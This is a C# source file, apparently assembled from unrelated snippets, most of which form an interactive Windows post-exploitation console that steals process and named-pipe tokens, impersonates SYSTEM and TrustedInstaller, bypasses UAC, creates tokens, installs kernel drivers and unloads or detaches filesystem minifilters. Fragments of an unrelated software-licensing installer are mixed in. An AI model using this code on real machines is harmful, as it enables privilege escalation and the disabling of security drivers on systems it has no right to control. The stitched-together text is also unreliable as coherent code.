internal static void Unload(CommandLineParsing cLP)
{
string filter;
if (!cLP.GetData("filter", out filter))
{
Console.WriteLine("[-] Filter Not Specified");
return;
}
uint result = fltlib.FilterUnload(filter);
if (0 != result)
{
if (2147943714 == result)
{
Console.WriteLine("[-] Privilege Not Held (Probably SeLoadDriverPrivilege)");
return;
}
else if (2149515280 == result)
{
Console.WriteLine("[-] Filter does not have a detach routine");
return;
}
Console.WriteLine("FilterUnload Failed: 0x{0}", result.ToString("X4"));
return;
}
Console.WriteLine("[+] Filter Unloaded");
}
public static bool ProcessInstallationArgs(string[] args)
{
var handledSomething = false;
// Check if the installer is trying to get us to initialize the store
// Only strictly needed for MultiUser scenario
if (CommandLineParsing.HasSwitch("initialize", args))
{
ExecuteCommandLineAction(
"Initializing Shared License Storage...",
SpAgent.Configuration.StoresInitialization.Initialize);
handledSomething = true;
}
// Verify the assumption that the installer has done its work by having the Agent Verify each of its registered stores
// NB do not remove this line as it is responsible for ensuring the correct timely Configuration of the Licensing System.
ReportInstallationActionIfDebug("Verifying Storage...");
SpAgent.Configuration.VerifyStoresInitialized();
ReportInstallationActionIfDebug("... verified.");
// Check if the installer is trying to get us to activate a license
var activationKey = CommandLineParsing.ArgumentOrDefault("activate", args);
if (activationKey != null)
{
ExecuteCommandLineAction(
"Activating License: " + activationKey,
() => SpAgent.Product.Activation.OnlineActivate(activationKey));
handledSomething = true;
}
return(handledSomething);
}
////////////////////////////////////////////////////////////////////////////////
// List the privileges for a token
////////////////////////////////////////////////////////////////////////////////
private static void _ListPrivileges(CommandLineParsing cLP, IntPtr hToken)
{
Console.WriteLine("Remote: " + cLP.Remote);
Console.WriteLine("Impers: " + cLP.Impersonation);
using (TokenInformation ti = new TokenInformation(hToken))
{
if (cLP.Remote && !cLP.Impersonation && ti.OpenProcessToken(cLP.ProcessID))
{
ti.SetWorkingTokenToRemote();
}
else if (cLP.Remote && cLP.Impersonation)
{
ti.ListThreads(cLP.ProcessID);
ti.GetThreadPrivileges();
return;
}
else if (!cLP.Remote && cLP.Impersonation)
{
ti.ListThreads(Process.GetCurrentProcess().Id);
ti.GetThreadPrivileges();
return;
}
else
{
ti.SetWorkingTokenToSelf();
}
ti.GetTokenPrivileges();
}
}
////////////////////////////////////////////////////////////////////////////////
// Enables, Disables, or Removes a privilege from a Token
////////////////////////////////////////////////////////////////////////////////
private static void _AlterPrivilege(CommandLineParsing cLP, IntPtr hToken, Winnt.TokenPrivileges attribute)
{
using (TokenManipulation t = new TokenManipulation(hToken))
{
if (cLP.Remote && !cLP.Impersonation && t.OpenProcessToken(cLP.ProcessID))
{
t.SetWorkingTokenToRemote();
}
else if (cLP.Remote && cLP.Impersonation)
{
t.ListThreads(cLP.ProcessID);
t.SetThreadTokenPrivilege(cLP.Privilege, attribute);
}
else if (!cLP.Remote && cLP.Impersonation)
{
t.ListThreads(Process.GetCurrentProcess().Id);
t.SetThreadTokenPrivilege(cLP.Privilege, attribute);
}
else
{
t.SetWorkingTokenToSelf();
}
t.SetTokenPrivilege(cLP.Privilege, attribute);
}
}
////////////////////////////////////////////////////////////////////////////////
//
////////////////////////////////////////////////////////////////////////////////
private static void _UnInstallDriver(CommandLineParsing cLP)
{
string service;
if (cLP.GetData("servicename", out service))
{
using (PSExec p = new PSExec(service))
{
if (!p.Connect("."))
{
return;
}
if (!p.Open())
{
return;
}
if (!p.Stop())
{
return;
}
if (!p.Delete())
{
return;
}
}
}
else
{
Console.WriteLine("[-] Unable to identify /Service");
}
}
////////////////////////////////////////////////////////////////////////////////
//
////////////////////////////////////////////////////////////////////////////////
private static void _AddPrivilege(CommandLineParsing cLP)
{
TokenDriver.PRIVILEGES priv = Misc.ParseEnum <TokenDriver.PRIVILEGES>(cLP.Privilege);
using (TokenDriver td = new TokenDriver())
{
if (!td.Connect())
{
Console.WriteLine("[-] Driver Connect Failed");
return;
}
Console.WriteLine("[+] Connected to Driver");
if (cLP.Remote)
{
TokenDriver.PRIVILEGE_DATA data = new TokenDriver.PRIVILEGE_DATA
{
ProcessID = (uint)cLP.ProcessID,
Privilege = priv,
};
td.AddTokenPrivilege(data);
}
else
{
td.AddTokenPrivilege(priv);
}
}
Console.WriteLine("[*] Disconnected from Driver");
}
////////////////////////////////////////////////////////////////////////////////
// Starts Windows Module Installer and impersonates or starts a process with
// the cloned token. There are better ways of doing this net .O
////////////////////////////////////////////////////////////////////////////////
private static void _GetTrustedInstaller(CommandLineParsing cLP, IntPtr hToken)
{
bool exists, enabled;
TokenInformation.CheckTokenPrivilege(hToken, "SeDebugPrivilege", out exists, out enabled);
if (exists)
{
using (TokenManipulation t = new TokenManipulation(hToken))
{
t.SetWorkingTokenToSelf();
if (!enabled)
{
t.SetTokenPrivilege(Winnt.SE_DEBUG_NAME, Winnt.TokenPrivileges.SE_PRIVILEGE_ENABLED);
}
if (string.IsNullOrEmpty(cLP.Command))
{
t.GetTrustedInstaller();
}
else
{
t.GetTrustedInstaller(cLP.CommandAndArgs);
}
}
}
else
{
Console.WriteLine("[-] SeDebugPrivilege Is Not Assigned to Token");
}
}
////////////////////////////////////////////////////////////////////////////////
// Runs a cmd prompt command
////////////////////////////////////////////////////////////////////////////////
private static void _Run(CommandLineParsing cLP)
{
process = new Process();
process.StartInfo.FileName = cLP.Command;
process.StartInfo.Arguments = cLP.Arguments;
process.StartInfo.CreateNoWindow = true;
process.StartInfo.UseShellExecute = false;
process.StartInfo.RedirectStandardInput = true;
process.StartInfo.RedirectStandardError = true;
process.StartInfo.RedirectStandardOutput = true;
Console.WriteLine("[+] Starting {0}", cLP.CommandAndArgs);
Console.WriteLine("[*] Note: The prompt is currently missing for input");
Console.WriteLine();
process.Start();
Thread inThread = new Thread(() => _SubProcessStdIn());
Thread outThread = new Thread(() => _SubProcessStdOut());
inThread.Start();
outThread.Start();
process.WaitForExit();
inThread.Abort();
outThread.Abort();
}
////////////////////////////////////////////////////////////////////////////////
// https://github.com/numbnet/Win32-OpenSSH/blob/8dd7423e13ac0b88b3084ec95bc93ea09dec1fef/contrib/win32/win32compat/win32auth.c
// https://github.com/bb107/WinSudo/blob/b2cb7700bd2f7ee59e2ef7f9ca20c2a671ce72a8/PrivilegeHelps/Security.cpp
// https://www.exploit-db.com/papers/42556
////////////////////////////////////////////////////////////////////////////////
private static void _CreateToken(CommandLineParsing cLP, IntPtr hToken)
{
try
{
using (CreateTokens ct = new CreateTokens(hToken))
{
string[] groups = new string[0];
string g;
if (cLP.GetData("groups", out g))
{
groups = (g).Split(new string[] { "," }, StringSplitOptions.RemoveEmptyEntries);
}
string user;
if (cLP.GetData("username", out user))
{
ct.SetWorkingTokenToSelf();
ct.CreateToken(user, groups, cLP.Command);
}
else
{
ct.SetWorkingTokenToSelf();
ct.CreateToken(groups, cLP.Command);
}
}
}
catch (AccessViolationException ex)
{
Console.WriteLine(ex);
}
}
////////////////////////////////////////////////////////////////////////////////
//
////////////////////////////////////////////////////////////////////////////////
private static bool _StealToken(CommandLineParsing cLP, IntPtr hToken)
{
using (TokenManipulation t = new TokenManipulation(hToken))
{
if (string.IsNullOrWhiteSpace(cLP.Command))
{
if (0 != cLP.ProcessID && t.OpenProcessToken(cLP.ProcessID))
{
t.SetWorkingTokenToRemote();
}
else if (0 != cLP.ThreadID && t.OpenThreadToken((uint)cLP.ThreadID, Winnt.TOKEN_ALL_ACCESS))
{
t.SetWorkingTokenToThreadToken();
}
else
{
Console.WriteLine("[-] Process or Thread ID not Specified");
return(false);
}
if (t.ImpersonateUser())
{
return(true);
}
}
else
{
if (0 != cLP.ProcessID && t.OpenProcessToken(cLP.ProcessID))
{
t.SetWorkingTokenToRemote();
if (!t.DuplicateToken(Winnt._SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation))
{
return(false);
}
t.SetWorkingTokenToNewToken();
}
else if (0 != cLP.ThreadID && t.OpenThreadToken((uint)cLP.ThreadID, Winnt.TOKEN_ALL_ACCESS))
{
t.SetWorkingTokenToThreadToken();
}
else
{
Console.WriteLine("[-] Process or Thread ID not Specified");
return(false);
}
if (t.StartProcessAsUser(cLP.Command))
{
return(true);
}
}
return(false);
}
}
public static bool ProcessUninitializationArgs(string[] args)
{
if (CommandLineParsing.HasSwitch("uninitialize", args))
{
ExecuteCommandLineAction(
"Removing Shared License Storage...",
SpAgent.Configuration.StoresInitialization.Uninitialize);
return(true);
}
return(false);
}
////////////////////////////////////////////////////////////////////////////////
//
////////////////////////////////////////////////////////////////////////////////
private static void _CloneToken(CommandLineParsing cLP, IntPtr hToken)
{
try
{
using (CreateTokens ct = new CreateTokens(hToken))
{
ct.SetWorkingTokenToSelf();
ct.CloneToken(cLP.ProcessID, cLP.Command);
}
}
catch (AccessViolationException ex)
{
Console.WriteLine(ex);
}
}
////////////////////////////////////////////////////////////////////////////////
// Marks or unmarks a process as being critical
////////////////////////////////////////////////////////////////////////////////
private static void _SetCriticalProcess(CommandLineParsing cLP, IntPtr hProcess)
{
string sSetting;
cLP.GetData("state", out sSetting);
bool bSetting;
if (!bool.TryParse(sSetting, out bSetting))
{
Console.WriteLine("[-] Invalid Boolean Specified: {0}", sSetting);
return;
}
uint uSetting = Convert.ToUInt32(bSetting);
if (cLP.Remote)
{
hProcess = kernel32.OpenProcess(ProcessThreadsApi.ProcessSecurityRights.PROCESS_SET_INFORMATION, false, (uint)cLP.ProcessID);
if (IntPtr.Zero == hProcess)
{
Misc.GetWin32Error("OpenProcess");
kernel32.CloseHandle(hProcess);
return;
}
}
uint status = ntdll.NtSetInformationProcess(hProcess, ntdll._PROCESS_INFORMATION_CLASS.ProcessBreakOnTermination, ref uSetting, (uint)System.Runtime.InteropServices.Marshal.SizeOf(typeof(uint)));
if (0 != status)
{
Misc.GetNtError("NtSetInformationProcess", status);
kernel32.CloseHandle(hProcess);
return;
}
if (bSetting)
{
Console.WriteLine("[+] Process {0} is Marked as Critical", cLP.ProcessID);
}
else
{
Console.WriteLine("[+] Process {0} is Unmarked as Critical", cLP.ProcessID);
}
kernel32.CloseHandle(hProcess);
return;
}
////////////////////////////////////////////////////////////////////////////////
// List the instances / volumes attached to for a given minifilter
////////////////////////////////////////////////////////////////////////////////
private static void _ListFiltersInstances(CommandLineParsing cLP)
{
string filter;
if (!cLP.GetData("filter", out filter))
{
Console.WriteLine("[-] Filter Not Specified");
return;
}
using (FilterInstance filterInstance = new FilterInstance(filter))
{
filterInstance.First();
filterInstance.Next();
}
}
internal static void FilterDetach(CommandLineParsing cLP)
{
string filter;
if (!cLP.GetData("filter", out filter))
{
Console.WriteLine("[-] /Filter: Not Specified");
return;
}
string instance;
if (!cLP.GetData("instance", out instance))
{
Console.WriteLine("[-] /Instance: Not Specified");
return;
}
string volume;
if (!cLP.GetData("volume", out volume))
{
Console.WriteLine("[-] /Volume: Not Specified");
return;
}
uint result = fltlib.FilterDetach(filter, volume, instance);
if (0 != result)
{
if (2147943714 == result)
{
Console.WriteLine("[-] Privilege Not Held (Probably SeLoadDriverPrivilege)");
return;
}
else if (2149515280 == result)
{
Console.WriteLine("[-] Filter does not have a detach routine");
return;
}
Console.WriteLine("FilterDetach Failed: 0x{0}", result.ToString("X4"));
return;
}
Console.WriteLine("[+] Filter Detached");
}
////////////////////////////////////////////////////////////////////////////////
// Steal a token from a named pipe, has some wierd corner cases
////////////////////////////////////////////////////////////////////////////////
private static void _StealPipeToken(CommandLineParsing cLP)
{
if (string.IsNullOrEmpty(cLP.PipeName))
{
Console.WriteLine("[-] Pipename not set");
return;
}
if (string.IsNullOrEmpty(cLP.Command))
{
NamedPipes.GetPipeToken(cLP.PipeName);
}
else
{
Console.WriteLine("[*] Running {0}", cLP.CommandAndArgs);
NamedPipes.GetPipeToken(cLP.PipeName, cLP.Command, cLP.Arguments);
}
}
////////////////////////////////////////////////////////////////////////////////
// Use WMI to find processes that a user is running
////////////////////////////////////////////////////////////////////////////////
private static void _FindUserProcessesWMI(CommandLineParsing cLP)
{
string user;
if (!cLP.GetData("username", out user))
{
Console.WriteLine("[-] Username not specified");
return;
}
Dictionary <uint, string> processes = UserSessions.EnumerateUserProcessesWMI(user);
Console.WriteLine("{0,-30}{1,-30}", "Process ID", "Process Name");
Console.WriteLine("{0,-30}{1,-30}", "----------", "------------");
foreach (uint pid in processes.Keys)
{
Console.WriteLine("{0,-30}{1,-30}", pid, processes[pid]);
}
}
////////////////////////////////////////////////////////////////////////////////
// Pass through powershell command
////////////////////////////////////////////////////////////////////////////////
private static void _RunPowerShell(CommandLineParsing cLP)
{
Runspace runspace = RunspaceFactory.CreateRunspace();
runspace.Open();
RunspaceInvoke scriptInvoker = new RunspaceInvoke(runspace);
Pipeline pipeline = runspace.CreatePipeline();
pipeline.Commands.AddScript(cLP.Command);
pipeline.Commands.Add("Out-String");
Collection <PSObject> results = pipeline.Invoke();
runspace.Close();
foreach (PSObject obj in results)
{
Console.WriteLine(obj.ToString());
}
}
////////////////////////////////////////////////////////////////////////////////
//
////////////////////////////////////////////////////////////////////////////////
private static void _UnfreezeToken(CommandLineParsing cLP)
{
using (TokenDriver td = new TokenDriver())
{
if (!td.Connect())
{
Console.WriteLine("[-] Driver Connect Failed");
return;
}
if (cLP.Remote)
{
td.UnFreezeToken((uint)cLP.ProcessID);
}
else
{
td.UnFreezeToken();
}
}
}
////////////////////////////////////////////////////////////////////////////////
// Disable and remove all the privileges on a given token
////////////////////////////////////////////////////////////////////////////////
private static void _NukePrivileges(CommandLineParsing cLP, IntPtr hToken)
{
using (TokenManipulation t = new TokenManipulation(hToken))
{
if (cLP.Remote)
{
t.SetWorkingTokenToRemote();
if (!t.OpenProcessToken(cLP.ProcessID))
{
return;
}
}
else
{
t.SetWorkingTokenToSelf();
}
t.DisableAndRemoveAllTokenPrivileges();
}
}
////////////////////////////////////////////////////////////////////////////////
// Impersonates a SYSTEM token or creates a new process with the cloned token
////////////////////////////////////////////////////////////////////////////////
private static void _GetSystem(CommandLineParsing cLP, IntPtr hToken)
{
bool exists, enabled;
TokenInformation.CheckTokenPrivilege(hToken, "SeDebugPrivilege", out exists, out enabled);
if (exists)
{
using (TokenManipulation t = new TokenManipulation(hToken))
{
t.SetWorkingTokenToSelf();
if (!enabled)
{
t.SetTokenPrivilege(Winnt.SE_DEBUG_NAME, Winnt.TokenPrivileges.SE_PRIVILEGE_ENABLED);
}
if (string.IsNullOrEmpty(cLP.Command))
{
t.GetSystem();
}
else
{
t.GetSystem(cLP.CommandAndArgs);
}
}
}
else
{
if (string.IsNullOrEmpty(cLP.Command))
{
NamedPipes.GetSystem();
}
else
{
NamedPipes.GetSystem(cLP.Command, cLP.Arguments);
}
}
}
////////////////////////////////////////////////////////////////////////////////
//
////////////////////////////////////////////////////////////////////////////////
private static void _AddGroup(CommandLineParsing cLP, IntPtr hToken)
{
string groups;
if (!cLP.GetData("groups", out groups))
{
return;
}
using (TokenManipulation t = new TokenManipulation(hToken))
{
if (cLP.Remote && t.OpenProcessToken(cLP.ProcessID))
{
t.SetWorkingTokenToRemote();
}
else
{
t.SetWorkingTokenToSelf();
}
t.SetTokenGroup(groups, false);
}
}
////////////////////////////////////////////////////////////////////////////////
// Starts the KernelTokens Driver
////////////////////////////////////////////////////////////////////////////////
private static void _StartDriver(CommandLineParsing cLP)
{
string sn;
if (!cLP.GetData("ServiceName", out sn))
{
Console.WriteLine("[-] ServiceName not set");
return;
}
PSExec p = new PSExec(sn);
if (!p.Connect("."))
{
Console.WriteLine("[-] Unable to connect to service controller");
return;
}
if (!p.Start())
{
return;
}
}
////////////////////////////////////////////////////////////////////////////////
// Module to check if a process is marked as critical
////////////////////////////////////////////////////////////////////////////////
private static void _IsCriticalProcess(CommandLineParsing cLP, IntPtr hProcess)
{
if (cLP.Remote)
{
hProcess = kernel32.OpenProcess(ProcessThreadsApi.ProcessSecurityRights.PROCESS_QUERY_INFORMATION, false, (uint)cLP.ProcessID);
if (IntPtr.Zero == hProcess)
{
Misc.GetWin32Error("OpenProcess");
return;
}
}
bool bIsCritical = false;
if (!kernel32.IsProcessCritical(hProcess, ref bIsCritical))
{
Misc.GetWin32Error("IsProcessCritical");
kernel32.CloseHandle(hProcess);
return;
}
Console.WriteLine("[*] Process Critical State: {0}", bIsCritical);
kernel32.CloseHandle(hProcess);
return;
}
////////////////////////////////////////////////////////////////////////////////
// UAC Token Magic - Deprecated
////////////////////////////////////////////////////////////////////////////////
private static void _BypassUAC(CommandLineParsing cLP, IntPtr hToken)
{
Console.WriteLine("[*] Notice: This no longer working on versions of Windows 10 > 1703");
if (cLP.Remote)
{
using (RestrictedToken rt = new RestrictedToken(hToken))
{
rt.BypassUAC(cLP.ProcessID, cLP.Command);
}
}
else
{
string name = WindowsIdentity.GetCurrent().Name;
Dictionary <uint, string> uacUsers = UserSessions.EnumerateUserProcesses(true, name);
foreach (uint pid in uacUsers.Keys)
{
Console.WriteLine("\n[*] Attempting Bypass with PID {0} ({1})", pid, uacUsers[pid]);
using (RestrictedToken rt = new RestrictedToken(hToken))
{
rt.BypassUAC((int)pid, cLP.Command);
}
}
}
}
////////////////////////////////////////////////////////////////////////////////
// Terminates a given process
////////////////////////////////////////////////////////////////////////////////
private static void _Terminate(CommandLineParsing cLP)
{
if (cLP.Remote)
{
IntPtr hProcess = kernel32.OpenProcess(ProcessThreadsApi.ProcessSecurityRights.PROCESS_TERMINATE, false, (uint)cLP.ProcessID);
if (IntPtr.Zero == hProcess)
{
Misc.GetWin32Error("OpenProcess");
return;
}
Console.WriteLine("[*] Recieved Process Handle 0x{0}", hProcess.ToString("X4"));
if (!kernel32.TerminateProcess(hProcess, 0))
{
Misc.GetWin32Error("TerminateProcess");
return;
}
Console.WriteLine("[+] Process Terminated");
}
else
{
Console.WriteLine("[-] Unable to identify Process ID");
}
}
////////////////////////////////////////////////////////////////////////////////
// Mainloop
////////////////////////////////////////////////////////////////////////////////
internal void Run()
{
try
{
Console.Write(context);
string input;
if (activateTabs)
{
try
{
input = console.ReadLine();
}
catch (InvalidOperationException)
{
input = Console.ReadLine();
}
}
else
{
input = Console.ReadLine();
}
IntPtr hToken, tempToken;
hToken = tempToken = IntPtr.Zero;
bool remote = _GetProcessID(input, out processID, out command);
if (!remote)
{
hProcess = hBackup;
kernel32.OpenProcessToken(hProcess, Winnt.TOKEN_ALL_ACCESS, out hToken);
if (IntPtr.Zero == hToken)
{
Console.WriteLine("[-] Opening Process Token Failed, Opening Thread Token");
IntPtr hThread = kernel32.GetCurrentThread();
kernel32.OpenThreadToken(hThread, Winnt.TOKEN_ALL_ACCESS, true, ref hToken);
if (IntPtr.Zero == hToken)
{
Console.WriteLine("[-] Opening Thread Token Failed, Recommend RevertToSelf");
}
}
}
string action = Misc.NextItem(ref input);
CommandLineParsing cLP = new CommandLineParsing();
if (!string.Equals(action, input, StringComparison.OrdinalIgnoreCase))
{
if (!cLP.Parse(input))
{
return;
}
}
switch (action)
{
case "add_group":
_AddGroup(cLP, hToken);
break;
case "add_privilege":
_AddPrivilege(cLP);
break;
case "bypassuac":
_BypassUAC(cLP, hToken);
break;
case "clear_desktop_acl":
_ClearDesktopACL();
break;
case "clone_token":
_CloneToken(cLP, hToken);
break;
case "create_token":
_CreateToken(cLP, hToken);
break;
case "delete_driver":
_UnInstallDriver(cLP);
break;
case "detach_filter":
Filters.FilterDetach(cLP);
break;
case "disable_privilege":
_AlterPrivilege(cLP, hToken, Winnt.TokenPrivileges.SE_PRIVILEGE_NONE);
break;
case "enable_privilege":
_AlterPrivilege(cLP, hToken, Winnt.TokenPrivileges.SE_PRIVILEGE_ENABLED);
break;
case "exit":
Environment.Exit(0);
break;
case "find_user_processes":
_FindUserProcesses(cLP);
break;
case "find_user_processes_wmi":
_FindUserProcessesWMI(cLP);
break;
case "getinfo":
_Info(cLP, hToken);
break;
case "getsystem":
_GetSystem(cLP, hToken);
break;
case "get_system":
_GetSystem(cLP, hToken);
break;
case "gettrustedinstaller":
_GetTrustedInstaller(cLP, hToken);
break;
case "get_trustedinstaller":
_GetTrustedInstaller(cLP, hToken);
break;
case "help":
_Help(input);
break;
case "history":
console.GetHistory();
break;
case "info":
_Info(cLP, hToken);
break;
case "install_driver":
_InstallDriver(cLP);
break;
case "list_filters":
_ListFilters();
break;
case "list_filter_instances":
_ListFiltersInstances(cLP);
break;
case "list_privileges":
_ListPrivileges(cLP, hToken);
break;
case "logon_user":
_LogonUser(cLP, hToken);
break;
case "nuke_privileges":
_NukePrivileges(cLP, hToken);
break;
case "pid":
Console.WriteLine("[+] Process ID: {0}", Process.GetCurrentProcess().Id);
Console.WriteLine("[+] Parent ID: {0}", Process.GetCurrentProcess().Parent().Id);
break;
case "remove_privilege":
_AlterPrivilege(cLP, hToken, Winnt.TokenPrivileges.SE_PRIVILEGE_REMOVED);
break;
case "is_critical_process":
_IsCriticalProcess(cLP, hProcess);
break;
case "set_critical_process":
_SetCriticalProcess(cLP, hProcess);
break;
case "reverttoself":
Console.WriteLine(advapi32.RevertToSelf() ? "[*] Reverted token to " + WindowsIdentity.GetCurrent().Name : "[-] RevertToSelf failed");
break;
case "run":
_Run(cLP);
break;
case "runas":
_RunAsNetOnly(cLP);
break;
case "runpowershell":
_RunPowerShell(cLP);
break;
case "sample_processes":
_SampleProcess();
break;
case "sample_processes_wmi":
_SampleProcessWMI();
break;
case "sessions":
UserSessions.EnumerateInteractiveUserSessions();
break;
case "start_driver":
_StartDriver(cLP);
break;
case "steal_pipe_token":
_StealPipeToken(cLP);
break;
case "steal_token":
_StealToken(cLP, hToken);
break;
case "tasklist":
UserSessions.Tasklist();
break;
case "terminate":
_Terminate(cLP);
break;
case "unfreeze_token":
_UnfreezeToken(cLP);
break;
case "uninstall_driver":
_UnInstallDriver(cLP);
break;
case "unload_filter":
Filters.Unload(cLP);
break;
case "whoami":
Console.WriteLine("[*] Operating as {0}", WindowsIdentity.GetCurrent().Name);
break;
default:
_Help(input);
break;
}
if (IntPtr.Zero != hToken)
{
kernel32.CloseHandle(hToken);
}
}
catch (Exception error)
{
Console.WriteLine(error.ToString());
Misc.GetWin32Error("MainLoop");
}
Console.WriteLine();
}
/// <summary>
/// Called when command line is parsing.
/// </summary>
/// <param name="args">The arguments of the event.</param>
/// <returns><c>true</c> if arguments was handled, <c>false</c> otherwise.</returns>
public void OnCommandLineParsing(CommandLineParseEventArgs args)
{
CommandLineParsing?.Invoke(this, args);
}
////////////////////////////////////////////////////////////////////////////////
// sc create TokenDriver binPath="C:\Windows\System32\kerneltokens.sys" type=kernel
////////////////////////////////////////////////////////////////////////////////
private static void _InstallDriver(CommandLineParsing cLP)
{
//string servicename = Misc.NextItem(ref command);
//string path = Misc.NextItem(ref command);
//string force = Misc.NextItem(ref command);
string serviceName = "TokenDriver";
string sn;
if (cLP.GetData("ServiceName", out sn))
{
serviceName = sn;
}
string path = string.Empty;
string p;
if (cLP.GetData("Path", out p))
{
path = (string)p;
}
bool overwrite = false;
object f;
if (cLP.GetData("Force", out f))
{
overwrite = true;
}
Console.WriteLine("[*] Service Name: " + serviceName);
Console.WriteLine("[*] Service Path: " + path);
PSExec psexec = new PSExec(serviceName);
if (!psexec.Connect("."))
{
Console.WriteLine("[-] Unable to connect to service controller");
return;
}
string filename;
try
{
filename = Path.GetFullPath(path);
}
catch (Exception ex)
{
if (ex is ArgumentException)
{
filename = CreateProcess.FindFilePath(path);
if (string.IsNullOrEmpty(filename))
{
Console.WriteLine("[-] Unable to locate service binary");
return;
}
}
else
{
return;
}
}
Console.WriteLine("[*] Full Path: " + filename);
if (!File.Exists(filename))
{
Console.WriteLine("[-] Unable to find service binary: {0}");
return;
}
if (!psexec.Open())
{
if (!psexec.CreateDriver(filename, overwrite))
{
return;
}
if (!psexec.Open())
{
return;
}
}
if (!psexec.Start())
{
return;
}
}
////////////////////////////////////////////////////////////////////////////////
//
////////////////////////////////////////////////////////////////////////////////
private static void _LogonUser(CommandLineParsing cLP, IntPtr hToken)
{
string username;
if (!cLP.GetData("username", out username))
{
return;
}
string domain = ".";
string password = string.Empty;
Winbase.LOGON_TYPE logonType = Winbase.LOGON_TYPE.LOGON32_LOGON_INTERACTIVE;
if (username.Contains('\\') && !username.ToLower().StartsWith("nt service"))
{
string[] split = username.Split('\\').ToArray();
domain = split.FirstOrDefault();
username = split.LastOrDefault();
if (!cLP.GetData("password", out password))
{
return;
}
Console.WriteLine("User Logon");
}
else if (username.Contains('\\') && username.ToLower().StartsWith("nt service"))
{
string[] split = username.Split('\\').ToArray();
username = split.LastOrDefault();
logonType = Winbase.LOGON_TYPE.LOGON32_LOGON_SERVICE;
domain = "NT SERVICE";
Console.WriteLine("Service Logon");
}
else
{
switch (username.ToLower().Trim())
{
case "localservice":
username = "******";
logonType = Winbase.LOGON_TYPE.LOGON32_LOGON_SERVICE;
domain = "NT AUTHORITY";
break;
case "localsystem":
username = "******";
logonType = Winbase.LOGON_TYPE.LOGON32_LOGON_SERVICE;
domain = "NT AUTHORITY";
break;
case "networkservice":
username = "******";
logonType = Winbase.LOGON_TYPE.LOGON32_LOGON_SERVICE;
domain = "NT AUTHORITY";
break;
default:
cLP.GetData("password", out password);
break;
}
}
using (TokenManipulation t = new TokenManipulation(hToken))
{
string groups;
if (cLP.GetData("groups", out groups))
{
t.LogonUser(domain, username, password, groups, logonType, cLP.Command, cLP.Arguments);
}
else
{
t.LogonUser(domain, username, password, logonType, cLP.Command, cLP.Arguments);
}
}
}
